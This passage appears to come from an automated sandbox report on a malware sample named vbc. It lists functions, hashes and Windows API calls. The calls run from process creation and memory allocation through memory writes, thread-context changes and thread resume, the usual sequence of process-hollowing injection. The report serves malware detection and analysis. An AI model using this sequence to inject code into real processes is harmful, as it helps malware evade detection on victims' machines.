                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 009009EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID: TDD$TDD$TDD
                                                    • API String ID: 963392458-2240957677
                                                    • Opcode ID: 142e2c900c59e57841ead4cc3c87b7f6031e3dcb73d5606b0b75e815b22c911e
                                                    • Instruction ID: f237034f24cb89e8a0c2386f6b06f0dd01c80aabd31ddb028babce74ba61c7a5
                                                    • Opcode Fuzzy Hash: 142e2c900c59e57841ead4cc3c87b7f6031e3dcb73d5606b0b75e815b22c911e
                                                    • Instruction Fuzzy Hash: 95C11470D0025D8FDF24CFA4C841BEDBBB1BB49304F1095A9D959B7280EB749A85CF94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E5FE8, Relevance: 2.6, Strings: 2, Instructions: 50COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 897 2e5fe8-2e605f 904 2e6077-2e607b 897->904 905 2e6061-2e6067 897->905 906 2e606b-2e606d 905->906 907 2e6069 905->907 906->904 907->904
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PS]p$PS]p
                                                    • API String ID: 0-3363070177
                                                    • Opcode ID: d6e72a2613954b0bb05808f2a552383f5c1a062d32013cb07fdf675d21a34843
                                                    • Instruction ID: 5cd7bc0973fd473c4f7e36a449485efa6098afeab0d9161becfbffec29b2fb1e
                                                    • Opcode Fuzzy Hash: d6e72a2613954b0bb05808f2a552383f5c1a062d32013cb07fdf675d21a34843
                                                    • Instruction Fuzzy Hash: 670145313082806FC3055B29D894AAE3BA6AFC57C0368817AE006CB3A2DBA1CD06C701
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E4E28, Relevance: 2.5, Strings: 2, Instructions: 31COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 908 2e4e28-2e4e3b 917 2e4e3c call 2e4e80 908->917 918 2e4e3c call 2e4e90 908->918 909 2e4e42-2e4e62 call 2e0720 913 2e4e7a-2e4e7c 909->913 914 2e4e64-2e4e6a 909->914 915 2e4e6e-2e4e70 914->915 916 2e4e6c 914->916 915->913 916->913 917->909 918->909
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PS]p$PS]p
                                                    • API String ID: 0-3363070177
                                                    • Opcode ID: be7f16cd71886e254cc22c6a85e98dac61fcd2c74d71ab0264cc4621f065b9de
                                                    • Instruction ID: 6108126b2c9085a5bca48eb2522f481e2157a682f1ea7edc89fba3f9a53a00b5
                                                    • Opcode Fuzzy Hash: be7f16cd71886e254cc22c6a85e98dac61fcd2c74d71ab0264cc4621f065b9de
                                                    • Instruction Fuzzy Hash: 21F02E303582D15FC3035F3A98549193FE56F4665131940D7E440CB3A7DB518C118791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00900390, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 919 900390-9003fb 921 900412-900479 WriteProcessMemory 919->921 922 9003fd-90040f 919->922 924 900482-9004d4 921->924 925 90047b-900481 921->925 922->921 925->924
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00900463
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 4e6ba4d9b6588328e392c04803d0eec553fe9080862b8d4569910b06811cb489
                                                    • Instruction ID: b101e2246d500ce03e7527cbb88f5f15fae12775f746fa31af5461a78a9fadf0
                                                    • Opcode Fuzzy Hash: 4e6ba4d9b6588328e392c04803d0eec553fe9080862b8d4569910b06811cb489
                                                    • Instruction Fuzzy Hash: 6841ABB5D012489FCF00CFA9D984ADEFBF1BB49314F20942AE914B7250D774AA45CF64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009004E8, Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 930 9004e8-9005b8 ReadProcessMemory 933 9005c1-900613 930->933 934 9005ba-9005c0 930->934 934->933
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 009005A2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: a95ba5c41545be89bc029bd313a1ce887ca6d3eccba469183d32dc8855e9c1fa
                                                    • Instruction ID: d76e11219837dc3046a1840ed682c2ad6ef84f2c2045c1fe8a586a9546a92410
                                                    • Opcode Fuzzy Hash: a95ba5c41545be89bc029bd313a1ce887ca6d3eccba469183d32dc8855e9c1fa
                                                    • Instruction Fuzzy Hash: 0741A8B5D042589FCF10CFAAD884AEEFBB1BF49310F24942AE815B7240D775A945CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009004F0, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 939 9004f0-9005b8 ReadProcessMemory 942 9005c1-900613 939->942 943 9005ba-9005c0 939->943 943->942
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 009005A2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 4e5f54c58aa831ac29c81f2f4cb5382d43929356e247e66c78d67ca876c9058f
                                                    • Instruction ID: b7fc44841314db83dd06f7f8f8ec72931fbb7febd363329889a26add93baeed4
                                                    • Opcode Fuzzy Hash: 4e5f54c58aa831ac29c81f2f4cb5382d43929356e247e66c78d67ca876c9058f
                                                    • Instruction Fuzzy Hash: 144199B5D042589FCF10CFAAD884AEEFBB1BF49314F10942AE814B7240D775A945CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00900260, Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 948 900260-900328 VirtualAllocEx 951 900331-90037b 948->951 952 90032a-900330 948->952 952->951
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00900312
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 350604a81801532d7a470fb00a4c121bb48b3ef7e76aee3364b6bd6786915c9e
                                                    • Instruction ID: 4e013f6fa551d033adf956acf412d72c1903586f81aece7a92dbec7ca0c74a17
                                                    • Opcode Fuzzy Hash: 350604a81801532d7a470fb00a4c121bb48b3ef7e76aee3364b6bd6786915c9e
                                                    • Instruction Fuzzy Hash: 3D41B9B5D042489FCF14CFA9D880ADEBBB1FF59310F10942AE814BB250E775A901CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00900268, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 957 900268-900328 VirtualAllocEx 960 900331-90037b 957->960 961 90032a-900330 957->961 961->960
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00900312
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 24925ee34f0efd394556a3291c39bb5e86007ede93277733c1d919356ddc9b9f
                                                    • Instruction ID: b08b921c0e8b94c2d75c8d46478ce4a1df79de54c302a92935fe790ce9e99e87
                                                    • Opcode Fuzzy Hash: 24925ee34f0efd394556a3291c39bb5e86007ede93277733c1d919356ddc9b9f
                                                    • Instruction Fuzzy Hash: F54197B5D042589FCF14CFA9D884ADEBBB5FB49314F20A42AE814BB240D775A905CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00900130, Relevance: 1.6, APIs: 1, Instructions: 100threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 966 900130-900198 968 90019a-9001ac 966->968 969 9001af-9001fd Wow64SetThreadContext 966->969 968->969 971 900206-900252 969->971 972 9001ff-900205 969->972 972->971
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 009001E7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: dc34c405fd378380fac0234e7572a7839600c10841fe3a8b9319ec72f5aec4b9
                                                    • Instruction ID: b9b8d3572dd0eb138fa4602d84d6766cf6e18994d811ef92b52e59a0627841e7
                                                    • Opcode Fuzzy Hash: dc34c405fd378380fac0234e7572a7839600c10841fe3a8b9319ec72f5aec4b9
                                                    • Instruction Fuzzy Hash: 3E41DDB4D002589FCB14CFA9D884AEEFBB0BF88314F24842AE415B7240D778A946CF94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00900138, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 977 900138-900198 979 90019a-9001ac 977->979 980 9001af-9001fd Wow64SetThreadContext 977->980 979->980 982 900206-900252 980->982 983 9001ff-900205 980->983 983->982
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 009001E7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: e8d7d9a30e884001b4eef6f3cc8d7fe49fc3e06f562f675dc24f4cba69a93887
                                                    • Instruction ID: 8b14ed9009ec2d72374cce8d0261cb5ce69b1f7ec78d70e2f74858cc93b45c28
                                                    • Opcode Fuzzy Hash: e8d7d9a30e884001b4eef6f3cc8d7fe49fc3e06f562f675dc24f4cba69a93887
                                                    • Instruction Fuzzy Hash: CC41ACB5D012589FCB14CFA9D884AEEFBB1BF49314F24842AE414B7240D778A945CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00900048, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1075 900048-9000dc ResumeThread 1078 9000e5-900127 1075->1078 1079 9000de-9000e4 1075->1079 1079->1078
                                                    APIs
                                                    • ResumeThread.KERNELBASE(?), ref: 009000C6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 400b42973e677b1025508e8b8250652a899c82c7856cf6da87d17bbbe32b2779
                                                    • Instruction ID: 4ededcdf0fc128573805136597c0cc2e79f8699a799372eeac3c94e7adc4febe
                                                    • Opcode Fuzzy Hash: 400b42973e677b1025508e8b8250652a899c82c7856cf6da87d17bbbe32b2779
                                                    • Instruction Fuzzy Hash: 8631A9B4D012589FCB14CFA9E884A9EFBB4EB89314F24942AE814B7340D775A905CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E17E8, Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6
                                                    • API String ID: 0-1003354411
                                                    • Opcode ID: 2a44b946a7915609014fc7d0e8384106d69d258a826d74955ba074113e5eed53
                                                    • Instruction ID: 64a6e6fa6c9fab99872fd1e47b21521f38904ef1eb35b13f0fe7e5c1358d00bb
                                                    • Opcode Fuzzy Hash: 2a44b946a7915609014fc7d0e8384106d69d258a826d74955ba074113e5eed53
                                                    • Instruction Fuzzy Hash: AE21E1317640608FD764DB7DE854D697BE5AF8971430681FAE40ACB772DA20DC51CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E4E80, Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *6
                                                    • API String ID: 0-3775417166
                                                    • Opcode ID: 09f5d671159d2c5ab27f7c7d5ce9344a7b397f1c0ba64613513193a87b583efa
                                                    • Instruction ID: 0fddb369c41f6c7d9a47a8630e87a0027b5319156107a018a31a0256754be94e
                                                    • Opcode Fuzzy Hash: 09f5d671159d2c5ab27f7c7d5ce9344a7b397f1c0ba64613513193a87b583efa
                                                    • Instruction Fuzzy Hash: C2F046393041801FC302E76DA400A6D77D99B8620470940AAE445CB3A7EE20DD0ACBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E7528, Relevance: .3, Instructions: 295COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4f0d2772e0a1356e8bc3a0f413ad6db1b5e9f796f24a303c4fbc9a85bdd29c3
                                                    • Instruction ID: e88810889ae8c8b3401265bdfa74dc2341a85060d8c65669d1497663723f9d0d
                                                    • Opcode Fuzzy Hash: b4f0d2772e0a1356e8bc3a0f413ad6db1b5e9f796f24a303c4fbc9a85bdd29c3
                                                    • Instruction Fuzzy Hash: 5BB1A174A6C1858FCB00CFAAC880ABDFBF1AF49300F9985A6E455EB292D374DD51CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E77C8, Relevance: .2, Instructions: 237COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1b080889f9927b828d95769af2c507a85f3ceef5bce126b81d142427b104b4a
                                                    • Instruction ID: ccb35e23c1a11e1824003d42b1bfa194aa2b307b102f35c89a208690c13ca9bb
                                                    • Opcode Fuzzy Hash: d1b080889f9927b828d95769af2c507a85f3ceef5bce126b81d142427b104b4a
                                                    • Instruction Fuzzy Hash: 1A91E330E6C2C6CFD7008F6AC8446ADBBB1EF46300F58456BD065DB282D378D961DB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E7C68, Relevance: .2, Instructions: 214COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5f329ecd6e7fd4fecad0bf9cc023e3a16e3b6c2a559c2c80aa9b5000808e0157
                                                    • Instruction ID: d8535b6082d45c03286316b865b9a4826a01b85234dad685f780b94ac7df2ae4
                                                    • Opcode Fuzzy Hash: 5f329ecd6e7fd4fecad0bf9cc023e3a16e3b6c2a559c2c80aa9b5000808e0157
                                                    • Instruction Fuzzy Hash: 6481D27196C2C58FCB018F7AC8402BABBF5EF46310FA845ABD155DB296D3748D21CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E72CE, Relevance: .2, Instructions: 202COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 03f53a91afe132694e8fb1cada7fb9c82163ebdb760394fc0144fa251044d34d
                                                    • Instruction ID: 0fa430c7c6096cad57d91573e8a02aea406eca4f21ddeb44abedbb35686700a1
                                                    • Opcode Fuzzy Hash: 03f53a91afe132694e8fb1cada7fb9c82163ebdb760394fc0144fa251044d34d
                                                    • Instruction Fuzzy Hash: A971243196C2D5CFCB01CF6AC8906A97FB1AF42300F5940E7E955DB2D2D3748925DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E6B38, Relevance: .2, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0ed703ef0fe47a1dce5c121324028c8314e8d773deee67d5b35dc738ced66cc3
                                                    • Instruction ID: 4c585b9854636e5ba4ae34562583df7958580e2538f213044fbaf367b2f0eb1e
                                                    • Opcode Fuzzy Hash: 0ed703ef0fe47a1dce5c121324028c8314e8d773deee67d5b35dc738ced66cc3
                                                    • Instruction Fuzzy Hash: 6D51E430B58249DFDB04DFA5CC467AEB7B2EF89345F50822AE101AB791DB709911CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E0498, Relevance: .1, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5d911116ec8c8dffc1acf26ab8d52f0303f7b3c6f930fee7abbf555b38e28f5e
                                                    • Instruction ID: 7b9b9317346c4325d804a879fc87331b38af0d6b52acf8f26c0990074d9788c8
                                                    • Opcode Fuzzy Hash: 5d911116ec8c8dffc1acf26ab8d52f0303f7b3c6f930fee7abbf555b38e28f5e
                                                    • Instruction Fuzzy Hash: 9E512B78D5010A9FDF10CFAAD880AEEBBB1BF89304F10A669D401FB254DB71AA45CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E2760, Relevance: .1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cf19188177996780305518987c57f4f3933cfa01087c70e66805b9334f143a30
                                                    • Instruction ID: 48b2727b63c4f6fc45728dfc9b36c58d690556a963569b67bff411094d6b56eb
                                                    • Opcode Fuzzy Hash: cf19188177996780305518987c57f4f3933cfa01087c70e66805b9334f143a30
                                                    • Instruction Fuzzy Hash: 7B41FC31B192A18FD7159B3A8890969BFA59F87304B59C0FFE549CF253C535CC0AC760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E7DE0, Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0ab24b760e54f58ea88e2eceabcf38222cd93924b25966c91d73afcc26cab6e3
                                                    • Instruction ID: 48fe99d6975f08f5715e4e9a2e36cc4044cad0bd7e4a77bed0358bf0783f63bc
                                                    • Opcode Fuzzy Hash: 0ab24b760e54f58ea88e2eceabcf38222cd93924b25966c91d73afcc26cab6e3
                                                    • Instruction Fuzzy Hash: 1531B33196C295CFCB44CF6AD8412AEBBF1FF49320F9881A7E415EB255D3348D618BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E9140, Relevance: .1, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4a4c978987799acd7ae1d0f38f58fe4d6c395e0f78bba5f93d01abb9e4c64377
                                                    • Instruction ID: 7d334132fd1589c040c7b97fa8a91aace5d89902c073b8b62dd96fefa0951f11
                                                    • Opcode Fuzzy Hash: 4a4c978987799acd7ae1d0f38f58fe4d6c395e0f78bba5f93d01abb9e4c64377
                                                    • Instruction Fuzzy Hash: FA3137B4D502899FDF00DFA9D8487EEBBB0FB0A305F50842AD50AA7290D7B859D4CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002EFBF0, Relevance: .1, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 03b1e2666745c0acb967a4d073b4c6e6a6ff1c3322753afa221a818286355e2f
                                                    • Instruction ID: 2510ea1182476de1e7baabdff9c8e6a4c65c85e69869a7f90f3910e36cdad809
                                                    • Opcode Fuzzy Hash: 03b1e2666745c0acb967a4d073b4c6e6a6ff1c3322753afa221a818286355e2f
                                                    • Instruction Fuzzy Hash: 4B31E234E1024D9FCB44CFA9D594AEEBBF1AF48310F60902AE905A7360DB30A951CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E5400, Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 801b74f8ed43a2c991e51d509651fe7eb8f721b9d57e8b8b868dbf062e82cbae
                                                    • Instruction ID: 909eacbc0750e9501c71b76a8a62cdc70eb13a811c3cb0eec6d5974845490251
                                                    • Opcode Fuzzy Hash: 801b74f8ed43a2c991e51d509651fe7eb8f721b9d57e8b8b868dbf062e82cbae
                                                    • Instruction Fuzzy Hash: 2421B3357546509FD7185B64E89CA2D3BA2EB89305F54803AE503CB7E2DF74CE828B11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0018D01C, Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483615473.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_18d000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d739d799257ba5798c9b8663a9ba259ee4696ee1e23c02e182e4e6c556b6f1ad
                                                    • Instruction ID: 5ed4a8de8282d59aa24b12771328c867fc937fef1d7ed07df4826f20188384d8
                                                    • Opcode Fuzzy Hash: d739d799257ba5798c9b8663a9ba259ee4696ee1e23c02e182e4e6c556b6f1ad
                                                    • Instruction Fuzzy Hash: DE21F275608344DFDB15EF10E884B2ABB65EB88314F34C569F9494B286C73AD906CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0018D1D4, Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483615473.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_18d000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 487b33ae9248c8340b9ad656b3b7a7c5f04b116b91cdb3d7c17c1afac1e3930b
                                                    • Instruction ID: 8279d700dd0d790425d2c5e4e00c7a72957fce3f8471600a58a4e33d92e603bd
                                                    • Opcode Fuzzy Hash: 487b33ae9248c8340b9ad656b3b7a7c5f04b116b91cdb3d7c17c1afac1e3930b
                                                    • Instruction Fuzzy Hash: 0A210475604344EFDB05EF10E9C4B2ABBA6FB88314F24C66DE9094B286C736D906CF61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E2730, Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f824a0484a848a4d0fc1b62db0e488be4de1a66976cd00def75fe72cf051a77
                                                    • Instruction ID: c5ac59c712202dbfd1aea4b780a5133cec99eb9b62ba13167160fe4e8de3249f
                                                    • Opcode Fuzzy Hash: 0f824a0484a848a4d0fc1b62db0e488be4de1a66976cd00def75fe72cf051a77
